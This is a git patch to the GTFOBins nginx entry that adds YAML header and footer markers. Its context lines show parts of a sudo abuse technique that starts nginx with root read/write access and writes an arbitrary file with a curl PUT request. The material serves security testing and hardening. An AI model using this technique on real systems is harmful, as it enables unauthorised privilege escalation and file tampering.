From 83589a13440214dadac332d0d8dfbf1aae215c31 Mon Sep 17 00:00:00 2001 From: godylockz <81207744+godylockz@users.noreply.github.com> Date: Thu, 23 Nov 2023 00:48:25 -0500 Subject: [PATCH] Add header/footer --- _gtfobins/nginx.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/_gtfobins/nginx.md b/_gtfobins/nginx.md index 98db0654..436983dd 100644 --- a/_gtfobins/nginx.md +++ b/_gtfobins/nginx.md @@ -1,3 +1,4 @@ +--- functions: sudo: - description: This will start a nginx webserver on the specified port. This will provide read/write access to all files on the system. The file path must be absolute. @@ -66,4 +67,5 @@ functions: } EOF sudo nginx -c $TFC - curl -X PUT http://localhost:$PORT$LFILE -d @$TF \ No newline at end of file + curl -X PUT http://localhost:$PORT$LFILE -d @$TF +--- \ No newline at end of file